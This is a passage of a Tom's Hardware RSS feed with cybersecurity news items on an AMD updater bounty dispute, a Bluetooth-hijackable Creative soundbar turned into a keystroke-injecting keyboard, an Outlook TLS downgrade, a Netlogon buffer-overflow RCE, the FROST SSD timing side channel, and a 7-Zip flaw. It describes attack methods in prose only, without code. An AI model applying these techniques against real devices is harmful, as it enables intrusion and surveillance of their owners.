                                                                        <pubDate>Fri, 12 Jun 2026 10:00:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/tsQMpJtLWfM65SXQmxWizQ-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Frustrated developer facepalm]]></media:description>                                                            <media:text><![CDATA[Frustrated developer facepalm]]></media:text>
                                <media:title type="plain"><![CDATA[Frustrated developer facepalm]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/tsQMpJtLWfM65SXQmxWizQ-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>AMD has denied a security researcher a $10,000 bug bounty despite the individual's work and cooperation with the company. Regulars at this pub <a href="https://www.tomshardware.com/tech-industry/cyber-security/security-researcher-says-amd-auto-updater-downloads-software-insecurely-enabling-remote-code-execution-company-rep-reportedly-said-man-in-the-middle-attacks-are-out-of-scope-ignored-bug" target="_blank">might remember</a> an article a while back about a security researcher who diagnosed a potential remote code execution (RCE) via a man-in-the-middle attack (MITM) in AMD's auto-updater software. Paul, the researcher, submitted a report at AMD's bug bounty program website, expecting both a fix and a payout for an RCE-class bug. The report was turned down as MITM attacks weren't covered by the program's policy. Nevertheless, Paul took down the blog post describing the situation due to AMD's request. It's <a href="https://mrbruh.com/amd2/" target="_blank">now come back online</a>, and the whole situation merits a facepalm or three.</p><p>First, the good news: the updater is now seemingly secured, and you if you download the latest version of AMD's software pack, you ought to get a fixed version. The road to this point has been far from smooth, though, and to this day, Paul seemingly never saw a dime for his efforts, a story that is becoming commonplace if <a href="https://www.tomshardware.com/tech-industry/cyber-security/microsofts-github-bans-security-researcher-who-posted-zero-day-windows-exploits-because-company-ruined-their-life-expert-claims-action-is-vindictive-and-promises-further-retaliation">Microsoft's issues with Nightmare-Eclipse</a> are anything to go by. An RCE bug would otherwise be worth $10,000 if AMD fully acquiesced the significance of problem.</p><p>The updated post contains the full story, and it goes as follows: Back in February, when AMD asked Paul to bring down the blog post temporarily, the company said it would issue a standard CVE, fix the software, and attribute the findings to him, though a bounty payment was out of the question. Paul agreed (a decision he now regrets), though he asked what kind of timeline AMD would follow, suggesting the industry-standard 90-day window until he posted the public disclosure again.</p><p>AMD replied saying that it would "likely need a longer embargo, as additional tools beyond Ryzen Master appear[ed] to be impacted and [would] need releases." That was an interesting statement in several ways: first, it raises the question exactly why AMD would need so long to publish what was seemingly a one-character fix, replacing "http" with "https" in the code. Second, if the issue was bad enough to require so long to solve, then arguably Paul's work would merit some recompense. Third, as Paul pointed out, if this issue looked this pressing, why didn't it have a higher priority?</p><p>Nevertheless, he ended up agreeing on a 100-day window, and asked AMD the equivalent of "wassup?" before the clock ticked its last tock, only to be asked for extra time again, being told that "multiple tools are affected by [the bug]", and that "[AMD's] customers request additional time once [the fixes] are made available." Eventually, AMD reached out stating that a fix would be ready on June 9, totaling 124 days after the initial finding.</p><p>To its credit, AMD seemingly reengineered the download code in the autoupdater altogether, and Paul verified that the new version does indeed download drivers securely, though he remarks that the software only checks the validity of the downloaded file using the ancient CRC32 hash that isn't considered cryptographically secure anymore.</p><p>Here's where irony strikes, though: according to a Reddit user, the bug that Paul found seemingly wouldn't be triggered anyway, as the relevant section of the code wasn't being called to begin with, meaning the updater was broken. So AMD couldn't update the updater because the updating code couldn't update, necessitating a fresh download on behalf of users. <em>Quis renovatores renovat </em>indeed.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Gaming soundbar can be hijacked from over 16 yards away without touch or pairing — the company allegedly refuses to label the blatant security flaw a cybersecurity risk ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/creatives-sound-blaster-katana-v2x-can-be-hijacked-over-bluetooth</link>
                                                                            <description>
                            <![CDATA[ Security researcher Rasmus Moorats has demonstrated that Creative's Sound Blaster Katana V2X gaming soundbar can be hijacked over Bluetooth from up to 16 yards away. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">DRVYmEXzfQ2wzvxdemPXXm</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/YUDxAZxxyWFMPWzwJRmWvH-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Sat, 06 Jun 2026 16:06:19 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Luke James ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/C4FAi2KzwaGLUrBqzX5aBM.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Luke is a freelance technology journalist who has been covering hardware and semiconductors since 2020. He began his career at All About Circuits and has since contributed to EE Power and Laptop Mag. Luke has a particular interest in semiconductors, microelectronics, and the industry shifts that shape the devices we use every day. Above all, he loves making complex technology accessible to experts and enthusiasts alike. Luke&#039;s interest in hardcore computing can be traced back to his university studies, when he responsibly spent his very first student loan payment on a custom-built gaming rig equipped with a GTX 780 Ti. &lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/YUDxAZxxyWFMPWzwJRmWvH-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[generic hack screen]]></media:description>                                                            <media:text><![CDATA[generic hack screen]]></media:text>
                                <media:title type="plain"><![CDATA[generic hack screen]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/YUDxAZxxyWFMPWzwJRmWvH-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Security researcher Rasmus Moorats has demonstrated that Creative's Sound Blaster Katana V2X gaming soundbar can be hijacked over Bluetooth from roughly 16 yards (15 meters) away, with no pairing or physical contact, in a <a href="https://blog.nns.ee/2026/06/03/katana-badusb/">blog post</a> published on June 3. By exploiting an unauthenticated Bluetooth interface and the absence of firmware signing, an attacker can flash custom firmware onto the speaker over the air, turning the USB-connected device into a keyboard that types commands into the host PC. Creative, which was contacted through Singapore's national cyber response team, took close to two months to reply and concluded the behavior was not a security risk, leaving owners of the ~$280 soundbar without an official patch.</p><p>The Katana V2X communicates with Creative's desktop app via a proprietary protocol that Moorats refers to as the Creative Transfer Protocol (CTP). Over USB, the speaker requires a challenge-response handshake before accepting any command, but over Bluetooth Low Energy, the same protocol accepts the same commands without authentication or pairing, so any device in range could read settings, change them, or push firmware. The firmware itself carries no cryptographic signature, only a SHA-256 checksum that Moorats recomputed after editing the image.</p><p>To weaponize that, he edited the speaker's USB descriptor set so that the device reported itself as a keyboard, on top of the limited media controls it already provided. The firmware ran a modified build of FreeRTOS, and instead of writing fresh keystroke-injection code, Moorats overwrote an unused diagnostic task with one that waits for the USB subsystem to come up, then types and runs a command on every boot. His proof of concept printed "echo pwned," but the same routine could open PowerShell and paste a malicious one-liner. </p><p>Reprogramming a trusted USB peripheral into a keyboard is how BadUSB works, which is the technique Karsten Nohl and Jakob Lell presented at Black Hat back in 2014, when they warned that most USB controllers shipped without firmware authenticity checks. </p><p>Those attacks required someone to plug in a doctored device, but Moorats managed to remove that step, since the malicious peripheral here is hardware the victim already owns and trusts, rewritten from across a room. We’ve seen similar patterns in other consumer gear over the years, including an <a href="https://www.tomshardware.com/tech-industry/cyber-security/security-researcher-finds-vulnerability-in-internet-connected-bed-could-allow-access-to-all-devices-on-network">internet-connected bed</a> whose firmware exposed the owner's home network and the <a href="https://www.tomshardware.com/news/blueborne-impacts-bluetooth-connected-devices,35439.html">BlueBorne flaws</a> that handed attackers control of Bluetooth devices without pairing.</p><p>Getting in touch with the speaker’s manufacturer, Creative, was the harder part of the work, Moorats wrote, because the only way to contact the company is via its support web form. After two failed attempts, he instead reported the company via the Singapore Cyber Emergency Response Team (SingCERT), which itself struggled to get a response. </p><p>Creative's eventual reply, according to his account, was that they “do not consider this to be a vulnerability, as it does not present a cybersecurity risk.” Moorats ultimately ended up doing Creative’s work for it, releasing a tool that downloads Creative's official firmware, patches out CTP-over-Bluetooth, and reflashes the speaker over USB. Doing so likely breaks Creative's mobile app, however, and Moorats noted that adding proper authentication is hard without the company's source code. Bluetooth on the speaker stays on even in sleep mode, with no obvious way to disable it.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Outlook may have allowed unencrypted connections for decades, report claims — Fedora and Dovecot upgrade reveal protocol downgrade issue present since at least 2007 ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/outlook-may-have-allowed-unencrypted-connections-for-decades-report-claims-fedora-and-dovecot-upgrade-reveal-protocol-downgrade-issue-present-since-at-least-2007</link>
                                                                            <description>
                            <![CDATA[ Ssh, don't tell the customer anything. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">cmnuazXNqZ7CbQZeyFi5Rn</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/TSmZBQLjkYfjFh8UuGUuBL-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 05 Jun 2026 10:30:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/TSmZBQLjkYfjFh8UuGUuBL-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Ripped envelope]]></media:description>                                                            <media:text><![CDATA[Ripped envelope]]></media:text>
                                <media:title type="plain"><![CDATA[Ripped envelope]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/TSmZBQLjkYfjFh8UuGUuBL-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>An IT blogger <a href="https://marius.bloggt-in-braunschweig.de/2026/06/03/outlook-hat-emailverbindung-nicht-verschluesselt/">claims</a> to have uncovered a high-impact security vulnerability in Microsoft Outlook, which was reportedly found to have been silently downgrading secure SSL/TLS connections to unencrypted plaintext without telling anyone. This appears to affect at least Outlook 2007 through 2016, and possibly even later versions, though that's as of yet unconfirmed if this behavior is present from Outlook 2019 onwards.</p><p>The report came by way of a blog post at Marius World, where the writer describes how they came across the issue after upgrading their mail servers from Fedora 42 to Fedora Server 43 (released in October 2025). Marius started getting complaints from customers unable to receive emails. All got the same error message from the mail server: "Cleartext authentication disallowed on non-secure (SSL/TLS) connections". This meant the user's mail client was trying to use an unencrypted connection, something that's been deprecated by systems administrators for decades.</p><p>Marius realized that all the affected people were using Outlook, from versions 2007 through 2016 at least. Worst of all, seemingly everyone actually had the "Use TLS/SSL" checkbox enabled, meaning that protocol security had been downgraded silently all along. The bug can be triggered by having port 110 selected and using the POP3 protocol. Having TLS forced on should have prompted the client to move to port 995 automatically, or at least attempt a TLS connection at 110 anyway. Yet Outlook just happily proceeds without encryption. "Customers have likely been retrieving their emails in plaintext for over a decade, mistakenly believing encryption was enabled," Marius states.</p><p>The reason why Fedora server administrators only recently started seeing this behavior is that version 43 upgraded the Dovecot SMTP/IMAP mail server to 2.4.3, a version that got a backend disabling unencrypted authentication altogether. Likely reasons why the issue wasn't found sooner are that nowadays the default mail account type is IMAP, and that Outlook's default configuration sets port 995 for POP3 as the default. Even still, there's a bet that a significant number of users are affected, particularly in environments that have to support many configurations, like web hosting.</p><p>The mitigation is fairly simple: check your Outlook account settings, and if you're using POP3, ensure that the connection port is 995. Having your email go through an unencrypted connection means anyone in your network or in the path to your server can happily read it, exposing not only your communications, but also those of other people. Marius also notes that this situation is technically a EU GDPR violation, since the law implicitly mandates that any customer data is sent via encrypted connections.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Windows Server vulnerability can grant system privileges with just a malformed packet — domain controllers are being exploited in the wild ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/windows-server-vulnerability-can-grant-system-privileges-with-just-a-malformed-packet-domain-controllers-are-being-exploited-in-the-wild</link>
                                                                            <description>
                            <![CDATA[ 9.8-rated Windows Server vulnerability can grants system privileges with just a malformed packet — domain controllers being exploited in the wild ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">KAoWeVRWgkBPUCDnFBFg2F</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/pz5RrXZwcNJ2XMi65FHwK9-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 01 Jun 2026 17:22:54 +0000</pubDate>                                                                                                                                <updated>Tue, 02 Jun 2026 00:27:04 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/pz5RrXZwcNJ2XMi65FHwK9-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[System administrator facepalming]]></media:description>                                                            <media:text><![CDATA[System administrator facepalming]]></media:text>
                                <media:title type="plain"><![CDATA[System administrator facepalming]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/pz5RrXZwcNJ2XMi65FHwK9-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The Great Exploitation of 2026 continues apace, with security vulnerabilities being published at an alarming rate, and more often than not, being exploited in the wild almost before anyone has any time to react. Today, Microsoft in the unfortunate limelight, with a 9.8-rated remote execution vulnerability affecting Windows Server domain controllers (DC), versions 2012 to current. The exploit and its explanation are simple: any unauthenticated user in the same network can send a malformed UDP packet to a DC and potentially get system access — no previous access required. Even if an attacker doesn't go that far, it's trivial for anyone to force the DC to reboot, creating potential denial-of-service scenarios.</p><p>The vulnerability is <a href="https://echelongraph.io/pulse/CVE-2026-41089" target="_blank">CVE-2026-41089</a>, and it's mercifully not a zero-day this time. The vulnerable service is Netlogon, and there's apparently no mitigation, with the only solution being to patch the affected systems. The patch itself arrives in the May 12 Patch Tuesday, but there's a fair chance that a lot of DCs remain unpatched, particularly but not only older versions. Systems administrators might also find <a href="https://secalerts.co/vulnerability/CVE-2026-41089" target="_blank">specific patch links</a> and <a href="https://securityarsenal.com/blog/cve-2026-41089-windows-netlogon-critical-rce-detection-and-remediation-guide" target="_blank">remediation scripts</a> handy.</p><p>If an attacker can finagle this vulnerability to get System-level of access to domain controllers, <a href="https://undercodetesting.com/cve-2026-41089-the-0-click-netlogon-rce-that-hands-attackers-the-keys-to-your-active-directory-kingdom-video/" target="_blank">the consequences</a> are pretty up to the imagination. The malfeasant can create any number of accounts with all sorts of access levels, including Kerberos Ticket-Granting Tickets, enabling access to most all data across the entire domain. Since DCs often operate as part of a larger network in medium-to-large enterprises, just one vulnerable machine is enough to make the entire network insecure. Cybersecurity boffins recommend that administrators treat this as a worm-style threat and patch all their linked DCs at once, to avoid playing a game of whack-a-mole with high odds for the moles.</p><p>Microsoft stated that the vulnerability was not made public at the time, and that no ongoing attacks were using it, but the situation has changed since the discovery date, as recent reports have confirmed that it's now being <a href="https://ccb.belgium.be/advisories/warning-microsoft-patch-tuesday-may-2026-patches-118-vulnerabilities-16-critical-102" target="_blank">exploited in the wild</a>.  As far as proof-of-concept goes, there's a GitHub repository with some sample code that forces the LSASS service to crash after a minute or so.</p><p>The technical details are simple and somewhat facepalm-inducing. The crafted network packet that triggers the vulnerability doesn't have anything all that fancy about it; it just contains one field that's larger than it should be. Data serialization logic in the Netlogon service combines the attacker-supplied data with the server's hostname, resulting in a classic buffer overflow — the most straightforward type of vulnerability.</p><p>Microsoft has been in security news quite often recently, mostly thanks to its <a href="https://www.tomshardware.com/tech-industry/cyber-security/microsofts-github-bans-security-researcher-who-posted-zero-day-windows-exploits-because-company-ruined-their-life-expert-claims-action-is-vindictive-and-promises-further-retaliation">ongoing spat</a> with security researcher Chaotic Eclipse (aka Nightmare Eclipse), who published a heap of zero-days exploits after apparent negotiations with the company broke down. The situation is unclear, but has escalated to the point where Microsoft is now <a href="https://www.theverge.com/tech/940416/microsoft-nightmare-eclipse-zero-day-vulnerability">threatening Eclipse with legal action</a>. </p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Researchers say they can spy on your browsing by measuring SSD activity through a browser API — claim FROST attack requires no permissions or user interaction to identify which apps and websites you're using ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/researchers-say-they-can-spy-on-your-browsing-by-measuring-ssd-activity-through-a-browser-api</link>
                                                                            <description>
                            <![CDATA[ FROST exploits the Origin Private File System (OPFS), a browser API that lets websites create and store files on a user's local disk. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">7yWecwPsHzmNiSCSHvGqtQ</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/d8Nwgqa5NTt3kiTbuye8zH-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 28 May 2026 13:10:38 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Luke James ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/C4FAi2KzwaGLUrBqzX5aBM.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Luke is a freelance technology journalist who has been covering hardware and semiconductors since 2020. He began his career at All About Circuits and has since contributed to EE Power and Laptop Mag. Luke has a particular interest in semiconductors, microelectronics, and the industry shifts that shape the devices we use every day. Above all, he loves making complex technology accessible to experts and enthusiasts alike. Luke&#039;s interest in hardcore computing can be traced back to his university studies, when he responsibly spent his very first student loan payment on a custom-built gaming rig equipped with a GTX 780 Ti. &lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/d8Nwgqa5NTt3kiTbuye8zH-1280-80.jpg">
                                                            <media:credit><![CDATA[Tom&#039;s Hardware]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Intel SSD 670p]]></media:description>                                                            <media:text><![CDATA[Intel SSD 670p]]></media:text>
                                <media:title type="plain"><![CDATA[Intel SSD 670p]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/d8Nwgqa5NTt3kiTbuye8zH-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Security researchers at Graz University of Technology in Austria have published a <a href="https://hannesweissteiner.com/pdfs/frost.pdf" target="_blank">paper</a> describing a side-channel attack that lets a malicious website identify what other sites and apps a visitor has open by measuring SSD access latency through JavaScript inside a standard browser sandbox. The technique, called FROST (Fingerprinting Remotely using OPFS-based SSD Timing), correctly identified visited websites with roughly 89% accuracy and running applications with roughly 96% accuracy on a test Mac, requires nothing from the victim beyond visiting the attacker's page, and works across different browsers. </p><p>FROST exploits the Origin Private File System (OPFS), a browser API that lets websites create and store files on a user's local disk without prompting for permission. Previous SSD <a href="https://www.tomshardware.com/tech-industry/cyber-security/apple-silicon-is-vulnerable-to-side-channel-speculative-execution-attacks-flop-and-slap">side-channel attacks</a> that we’ve seen require native code running through privileged kernel interfaces, but FROST eliminates that requirement. </p><p>The team disclosed their findings to Google, Apple, and Mozilla: Google said it doesn’t consider fingerprinting a security vulnerability, Apple called the attack "currently out of scope," and Mozilla acknowledged the findings without implementing fixes.</p><p>The attack creates a large OPFS file on the victim's SSD, with both Chrome and Safari allowing a website to claim up to 60% of total disk space through OPFS, which on a 256GB drive is over 150GB. The file must exceed the system's available RAM so that every random 4 KB read hits the SSD rather than the OS’s page cache. When other activity generates its own disk I/O, it creates measurable latency spikes in the attacker's reads, and those timing patterns are fed into a convolutional neural network trained to recognize specific websites and applications by their I/O signatures.</p><p>Because the contention occurs at the storage level, the attack works across browsers; running the attacker page in Chrome while the victim browsed in Safari showed only a 3.38% throughput difference versus a same-browser attack.</p><p>The full fingerprinting attack was only tested on an M2 Mac Mini with 8GB of RAM and a 256GB SSD. On Linux, the researchers confirmed they could measure SSD latency from the browser, but didn’t run the full fingerprinting classification, and Windows wasn’t tested at all. The OPFS file must also reside on the same physical SSD as the monitored activity, which isn’t guaranteed on multi-drive workstations.</p><p>By far the biggest barrier to this attack is the large file size; most people will notice tens or hundreds of gigabytes suddenly disappearing, but the researchers propose mitigations, including capping OPFS file sizes to fit within system memory or requiring explicit permission for OPFS file creation. Given that Google doesn’t classify <a href="https://www.tomshardware.com/software/browsers/linkedin-scans-visitors-browsers-for-over-6000-chrome-extensions-and-collects-device-data">fingerprinting as a security issue</a>, browser-level fixes are unlikely in the near term. </p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Wide-ranging 7-zip vulnerability with 8.8 CVE rating allows for code execution — hundreds of millions of machines potentially at risk ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/wide-ranging-7-zip-vulnerability-with-8-8-cve-rating-allows-for-code-execution-hundreds-of-millions-of-machines-potentially-at-risk</link>
                                                                            <description>
                            <![CDATA[ Wide-ranging 7-zip vulnerability allows for code execution and has an 8.8 CVE rating, hundreds of millions of machines potentially vulnerable ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">7No92sf6MjbZRGDZCwPADE</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/ucUhNfGZdnCABW3iy4K22E-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 28 May 2026 11:00:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/ucUhNfGZdnCABW3iy4K22E-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Archive burning]]></media:description>                                                            <media:text><![CDATA[Archive burning]]></media:text>
                                <media:title type="plain"><![CDATA[Archive burning]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/ucUhNfGZdnCABW3iy4K22E-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>There seems to be no end in sight for serious, wide-ranging security vulnerabilities these days. The ever-popular open-source archive-handling utility 7-Zip is now in the spotlight due to<a href="https://socprime.com/blog/cve-2026-48095-7-zip-heap-overflow-flaw/"> <u>an 8.8-rated CVE vulnerability</u></a> in its archive-opening procedure. If a user simply opens a booby-trapped crafted archive (.7z, .zip, .rar, etc) on a machine with at least 16 GB of RAM, they'll be running malicious code. Extracting the archive isn't necessary; only opening it is enough. We recommend that everyone immediately update to the latest version, 26.01, published in late April; all previous versions are vulnerable.</p><p>This is a particularly "<a href="https://www.youtube.com/watch?v=Ph4xmHYP_2s"><u>oh sugar honey ice tea</u></a>" moment because of how widespread 7-Zip is in practice. Most people would only think of the Windows graphical application, but every command-line variant is vulnerable across multiple operating systems. 7-Zip doesn't have any built-in update mechanisms, relying instead on user-initiated updates or package management systems.</p><p>The Windows application being vulnerable is bad enough; however, one needs to add millions of command-line scripts that are indirectly vulnerable, as are CI/CD workflows. Anything that so much as calls any variant of the "7z" binary and opens a poisoned archive, even if just to list the contents, is at risk.</p><div  class="fancy-box"><div class="fancy_box-title">Go deeper with TH Premium: AI and data centers</div><div class="fancy_box_body"><figure class="van-image-figure "  ><div class='image-full-width-wrapper'><div class='image-widthsetter' ><p class="vanilla-image-block" style="padding-top:56.25%;"><img id="Vh4nY3pMCcmra2ymXah9S7" name="Microsoft data center in Mount Pleasant, Wisconsin" caption="" alt="Microsoft data center in Mount Pleasant, Wisconsin" src="https://cdn.mos.cms.futurecdn.net/Vh4nY3pMCcmra2ymXah9S7.jpg" mos="" link="" align="" fullscreen="" width="" height="" attribution="" endorsement="" class="pinterest-pin-exclude"></p></div></div><figcaption itemprop="caption description" class=""><span class="credit" itemprop="copyrightHolder">(Image credit: Microsoft)</span></figcaption></figure><p class="fancy-box__body-text"><ul><li><a data-analytics-id="inline-link" 